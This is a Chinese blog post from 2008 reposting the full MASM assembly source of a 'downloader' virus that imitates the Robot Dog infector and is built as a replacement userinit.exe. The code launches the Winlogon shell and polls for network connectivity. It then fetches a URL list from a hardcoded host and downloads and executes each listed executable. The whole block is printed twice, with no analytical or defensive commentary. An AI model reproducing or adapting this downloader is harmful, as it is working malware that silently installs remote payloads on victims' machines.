上一篇
下一篇
08-06
25
(非原创)整理后的"下载者"病毒的代码
作者:Java伴侣 日期:2008-06-25
复制内容到剪贴板
程序代码
程序代码;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0
szTempPath db '.',0
szValueName db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;以当前进程的STARTUPINFO启动exe文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt proc @lpExePath
local @stStartupInfo:STARTUPINFO
local @stProcessInformation:PROCESS_INFORMATION
invoke GetStartupInfo,addr @stStartupInfo
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
.if eax == 0
invoke CloseHandle,@stProcessInformation.hThread
invoke CloseHandle,@stProcessInformation.hProcess
.endif
ret
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;下载文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax,eax
mov @nWriteCount,eax
invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
mov @hInternet, eax
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
.if eax != NULL
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
.if eax != NULL
invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite,0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax,@nWriteCount
ret
_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE
mov @DownTimes,3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
.repeat
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
.if eax != NULL
invoke _RunIt,addr @TempFileName
.break
.else
invoke Sleep,3E8h
dec @DownTimes
.endif
.until (!@DownTimes)
dec nThreadCount
ret
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc
local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local @szWinlogonPath[104h]:BYTE
;加载user32.dll,执行LoadRemoteFonts函数 (这函数是干吗的?)
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
invoke GetProcAddress,eax,offset szLoadRemoteFonts
.if eax != NULL
call eax
.endif
.endif
;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
mov @nSizeOfPath,104h
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
invoke _RunIt,addr @szWinlogonPath
invoke RegCloseKey,@hKey
.endif
;检查网络是否连接,不断重试
invoke Sleep,3E8h
.while TRUE
invoke InternetGetConnectedState,addr @nSizeOfPath,0
.break .if eax
.endw
;取一个临时文件名,并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
.break .if eax
.endw
;打开列表文件,验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
mov @hFile,eax
invoke GetFileSize,@hFile,NULL
.if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
.if eax != NULL
mov @hObject,eax
invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
.if eax != NULL
mov @lpBaseAddress,eax
mov esi,eax
BeginDownEXE:
lea edi,@szWinlogonPath
invoke RtlZeroMemory,edi,104h
;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
.repeat
lodsb
.if al == 0Ah
lodsb
.endif
.if al == 0Dh
.if @szWinlogonPath != 0
inc nThreadCount
invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
invoke CloseHandle,eax
invoke Sleep,64h
.endif
jmp BeginDownEXE
.endif
stosb
.until (!al)
invoke UnmapViewOfFile,@lpBaseAddress
.endif
invoke CloseHandle,@hObject
.endif
.else
invoke CloseHandle,@hFile
jmp DownloadList
.endif
invoke CloseHandle,@hFile
.else
jmp DownloadList ;无法打开则重新下载
.endif
;不断sleep,直到所有线程结束
.while nThreadCount
invoke Sleep,64h
.endw
invoke ExitProcess,0
main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0
szTempPath db '.',0
szValueName db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;以当前进程的STARTUPINFO启动exe文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt proc @lpExePath
local @stStartupInfo:STARTUPINFO
local @stProcessInformation:PROCESS_INFORMATION
invoke GetStartupInfo,addr @stStartupInfo
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
.if eax == 0
invoke CloseHandle,@stProcessInformation.hThread
invoke CloseHandle,@stProcessInformation.hProcess
.endif
ret
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;下载文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax,eax
mov @nWriteCount,eax
invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
mov @hInternet, eax
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
.if eax != NULL
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
.if eax != NULL
invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite,0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax,@nWriteCount
ret
_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE
mov @DownTimes,3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
.repeat
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
.if eax != NULL
invoke _RunIt,addr @TempFileName
.break
.else
invoke Sleep,3E8h
dec @DownTimes
.endif
.until (!@DownTimes)
dec nThreadCount
ret
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc
local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local @szWinlogonPath[104h]:BYTE
;加载user32.dll,执行LoadRemoteFonts函数 (这函数是干吗的?)
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
invoke GetProcAddress,eax,offset szLoadRemoteFonts
.if eax != NULL
call eax
.endif
.endif
;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
mov @nSizeOfPath,104h
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
invoke _RunIt,addr @szWinlogonPath
invoke RegCloseKey,@hKey
.endif
;检查网络是否连接,不断重试
invoke Sleep,3E8h
.while TRUE
invoke InternetGetConnectedState,addr @nSizeOfPath,0
.break .if eax
.endw
;取一个临时文件名,并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
.break .if eax
.endw
;打开列表文件,验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
mov @hFile,eax
invoke GetFileSize,@hFile,NULL
.if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
.if eax != NULL
mov @hObject,eax
invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
.if eax != NULL
mov @lpBaseAddress,eax
mov esi,eax
BeginDownEXE:
lea edi,@szWinlogonPath
invoke RtlZeroMemory,edi,104h
;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
.repeat
lodsb
.if al == 0Ah
lodsb
.endif
.if al == 0Dh
.if @szWinlogonPath != 0
inc nThreadCount
invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
invoke CloseHandle,eax
invoke Sleep,64h
.endif
jmp BeginDownEXE
.endif
stosb
.until (!al)
invoke UnmapViewOfFile,@lpBaseAddress
.endif
invoke CloseHandle,@hObject
.endif
.else
invoke CloseHandle,@hFile
jmp DownloadList
.endif
invoke CloseHandle,@hFile
.else
jmp DownloadList ;无法打开则重新下载
.endif
;不断sleep,直到所有线程结束
.while nThreadCount
invoke Sleep,64h
.endw
invoke ExitProcess,0
main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 0 | 引用: 0 | 查看次数: 506
发表评论
